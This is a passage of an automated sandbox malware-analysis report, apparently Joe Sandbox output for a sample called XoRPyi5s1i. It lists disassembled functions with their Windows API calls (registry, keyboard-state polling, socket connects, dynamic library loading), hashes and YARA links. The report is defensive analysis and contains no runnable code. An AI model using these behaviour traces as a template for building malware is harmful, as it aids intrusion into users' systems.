                                    • Instruction ID: 2eb98b677303ce1f91fbb3baf4019153dab89a1434f9b86b99357eb44c81a7bf
                                    • Opcode Fuzzy Hash: 88876973c6fc538327b26af382ec1f78de1e4c60133470e5084051e0a42c711e
                                    • Instruction Fuzzy Hash: E1219535600108AFCB14EFA4DD85EAEB7B8EF59704F104069F909E7251DB70EA45CB61
                                    Function 0016C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0016C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0016C84A
                                      • Part of subcall function 0016C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0016C85D
                                      • Part of subcall function 0016C82D: GetCurrentThreadId.KERNEL32 ref: 0016C864
                                      • Part of subcall function 0016C82D: AttachThreadInput.USER32(00000000), ref: 0016C86B
                                    • GetFocus.USER32 ref: 0016CA05
                                      • Part of subcall function 0016C876: GetParent.USER32(?), ref: 0016C884
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0016CA4E
                                    • EnumChildWindows.USER32(?,0016CAC4), ref: 0016CA76
                                    • __swprintf.LIBCMT ref: 0016CA90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                    • String ID: %s%d
                                    • API String ID: 3187004680-1110647743
                                    • Opcode ID: 14228b9563abeef592b1768acde177d265d8b50fb12de9151c5285906dace731
                                    • Instruction ID: 905868439bae96d8cc429706f4fbb21335cb8ddef86ed0203b6a9eb2ef050a0b
                                    • Opcode Fuzzy Hash: 14228b9563abeef592b1768acde177d265d8b50fb12de9151c5285906dace731
                                    • Instruction Fuzzy Hash: D11181716002097BCB15BFA0DC85FFA376DAF54714F00806AFE58AB182DB749955DBB0
                                    Function 00191945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001919F3
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00191A26
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00191B49
                                    • CloseHandle.KERNEL32(?), ref: 00191BBF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: ed8e2102f5f20819001859be68c8bed5e0a7353134fd9cfaa8ff613de49d7a1c
                                    • Instruction ID: 48047c57814e7a85ad57c5a5a3d6bc8f174f73022510e4c4bfaa3d8ae78b78c5
                                    • Opcode Fuzzy Hash: ed8e2102f5f20819001859be68c8bed5e0a7353134fd9cfaa8ff613de49d7a1c
                                    • Instruction Fuzzy Hash: 9B818370A00205ABDF14DF64C886BADBBF5FF18720F148459F909AF392D7B4A981CB90
                                    Function 0019E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0019E1D5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0019E20D
                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0019E248
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0019E269
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0019E281
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                    • String ID:
                                    • API String ID: 3188977179-0
                                    • Opcode ID: 49d5858d1bee66405297b0c2092d21012ed8f7dec4dc8a8645bdad5dd0b8cec5
                                    • Instruction ID: 9f00f8adb095b73eaa4c08d8faf6595cce003f42cc79f41be6c119aecaeffa51
                                    • Opcode Fuzzy Hash: 49d5858d1bee66405297b0c2092d21012ed8f7dec4dc8a8645bdad5dd0b8cec5
                                    • Instruction Fuzzy Hash: 01618D74A04248AFDF25CF58CC95FFA77FAAF89310F184069F959972A1C771A990CB10
                                    Function 00190688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001906EE
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0019077D
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0019079B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 001907E1
                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 001907FB
                                      • Part of subcall function 0014E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0017A574,?,?,00000000,00000008), ref: 0014E675
                                      • Part of subcall function 0014E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0017A574,?,?,00000000,00000008), ref: 0014E699
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: 8605864f97594c2cad177a4debeb20a381eb3c8f153d54d0c86079ac66b6a455
                                    • Instruction ID: 4bde8210c5e918d85b558d950bc1a5bc13c0926857ebc02a63e1c4f2fe39d049
                                    • Opcode Fuzzy Hash: 8605864f97594c2cad177a4debeb20a381eb3c8f153d54d0c86079ac66b6a455
                                    • Instruction Fuzzy Hash: 8B512775A00209DFCF05EFA8D8819ADB7B5BF58320F058059EA55AB352DB30ED45CB80
                                    Function 00192E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00192EEF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00192F2E
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00192F75
                                    • RegCloseKey.ADVAPI32(?,?), ref: 00192FA1
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00192FAE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 3740051246-0
                                    • Opcode ID: 162ae9d5fe9df928c0879c54366e707753e3d11d57f879bd1bad35db1e1911ee
                                    • Instruction ID: 1cd5347df822e326710328aa83a7bfc01b230e6faab8886c8ff13245fe3b41a0
                                    • Opcode Fuzzy Hash: 162ae9d5fe9df928c0879c54366e707753e3d11d57f879bd1bad35db1e1911ee
                                    • Instruction Fuzzy Hash: 2F515D72208204AFDB04EF64D881E6BB7F9FF98314F04896DF59597291DB30E905CB92
                                    Function 00188DE2 Relevance: 7.6, APIs: 5, Instructions: 136networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00188E7C
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188E89
                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00188EAD
                                    • _strlen.LIBCMT ref: 00188EF7
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188F6A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_strlenselect
                                    • String ID:
                                    • API String ID: 2217125717-0
                                    • Opcode ID: e32583edf5086557cee6ff2819577502595b1030bfe09b6bb03247a3091eb87b
                                    • Instruction ID: 2eb7ad8168c7fef64fddaba78463a8f6a0cb4750506da992fcbbac87ace44d6e
                                    • Opcode Fuzzy Hash: e32583edf5086557cee6ff2819577502595b1030bfe09b6bb03247a3091eb87b
                                    • Instruction Fuzzy Hash: 4F416071500104AFCB18EFA4DD96EAEB7B9AF68314F504659F51AA7291EF30AF40CB60
                                    Function 0019CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9a27b9f5857055fed8df637ab8a58f648b0bb9cc067f4756138d15c40768112e
                                    • Instruction ID: 496707a7c5a601dccf1e3d909ed8d79d25a082f0ab1ae7159c2ed17be32c4425
                                    • Opcode Fuzzy Hash: 9a27b9f5857055fed8df637ab8a58f648b0bb9cc067f4756138d15c40768112e
                                    • Instruction Fuzzy Hash: DA41B479900105AFCF14DBA8CC48FA9BFA9EB09320F150265F99AA72D1D770AD41DAD0
                                    Function 00181206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001812B4
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001812DD
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0018131C
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00181341
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00181349
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: 99b85538cec50f3c7f7a1428236493bd7d48b76519d71e300a50f968c1d51bfc
                                    • Instruction ID: f4cebef587c896602663cf5270963df59de4ef7b208727c2faf839d0211a18cc
                                    • Opcode Fuzzy Hash: 99b85538cec50f3c7f7a1428236493bd7d48b76519d71e300a50f968c1d51bfc
                                    • Instruction Fuzzy Hash: 3741F975A00105EFCB05EF64C9819AEBBF5FF18310B148099E90AAB361DB31EE41DF91
                                    Function 0014B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(000000FF), ref: 0014B64F
                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                    • GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                    • GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: 2968427e27458e22342025d5b3aa55b85f73b591875868a37bd6d74425f99db0
                                    • Instruction ID: d5d16d11bed0a9804396a1decd9aa15688f7813436b331778d5fb93992986d36
                                    • Opcode Fuzzy Hash: 2968427e27458e22342025d5b3aa55b85f73b591875868a37bd6d74425f99db0
                                    • Instruction Fuzzy Hash: F0418275908115FFCF199F64C884AE9BBB4FB06324F114319F82A962A0DB30AD94DFA1
                                    Function 0016B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 0016B369
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0016B413
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0016B41B
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0016B429
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0016B431
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: bd0ff474bcf74edd2e4688591e4bfde8ba7fff356270b0473d975d77340d223e
                                    • Instruction ID: 16e33a5f59945eca311248bd6356540440a022c9640db3820719258b64edee16
                                    • Opcode Fuzzy Hash: bd0ff474bcf74edd2e4688591e4bfde8ba7fff356270b0473d975d77340d223e
                                    • Instruction Fuzzy Hash: AF31D171A04219EBDF08CF68DD8DA9E3BB5FB04315F114229F821EB2D1D7B099A4CB90
                                    Function 0016DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 0016DBD7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0016DBF4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0016DC2C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0016DC52
                                    • _wcsstr.LIBCMT ref: 0016DC5C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: a72e6c20f5fcbc1f4a1f3ef1d8f76dd05d3dba63493756bda9bd1aeaf8cc6a81
                                    • Instruction ID: 100bb4c06fa24fa1550ce292140095042e33c52e6b9cf2701557fca705bce085
                                    • Opcode Fuzzy Hash: a72e6c20f5fcbc1f4a1f3ef1d8f76dd05d3dba63493756bda9bd1aeaf8cc6a81
                                    • Instruction Fuzzy Hash: B821D472B04244BBEB199F39EC49E7B7BA8DF45760F11413DF809CA191EBA1DC51D2A0
                                    Function 0016BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0016BC90
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0016BCC2
                                    • __itow.LIBCMT ref: 0016BCDA
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0016BD00
                                    • __itow.LIBCMT ref: 0016BD11
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: b19e78800d18bf222a2f247846e7170b77266e202505e4683c85b7450a9dd47f
                                    • Instruction ID: fcfc6f407c925cd4ded696d6a492862fca712ac05ad678bfd72e45c8229d7be6
                                    • Opcode Fuzzy Hash: b19e78800d18bf222a2f247846e7170b77266e202505e4683c85b7450a9dd47f
                                    • Instruction Fuzzy Hash: EF21DB35600208BBDB15AEA59CC5FDE7B69AF6A750F010034F905EF181EB708D9587A1
                                    Function 00176318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001350E6: _wcsncpy.LIBCMT ref: 001350FA
                                    • GetFileAttributesW.KERNEL32(?,?,?,?,001760C3), ref: 00176369
                                    • GetLastError.KERNEL32(?,?,?,001760C3), ref: 00176374
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001760C3), ref: 00176388
                                    • _wcsrchr.LIBCMT ref: 001763AA
                                      • Part of subcall function 00176318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001760C3), ref: 001763E0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                    • String ID:
                                    • API String ID: 3633006590-0
                                    • Opcode ID: fd3db3f1ed7b35d227e9be2104e643c7b3228223680b8b2e924ff213af1551b2
                                    • Instruction ID: d3ca1ed1f008dd775a0d94546f7fecd5274e946cfad537e00d9d551a3558b13b
                                    • Opcode Fuzzy Hash: fd3db3f1ed7b35d227e9be2104e643c7b3228223680b8b2e924ff213af1551b2
                                    • Instruction Fuzzy Hash: C6212731504A158BDB19AB78AC46FEA33BCFF19360F10806AF44DD71D0EB60D985CA51
                                    Function 00188B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0018A82C: inet_addr.WS2_32(00000000), ref: 0018A84E
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00188BD3
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188BE2
                                    • connect.WS2_32(00000000,?,00000010), ref: 00188BFE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
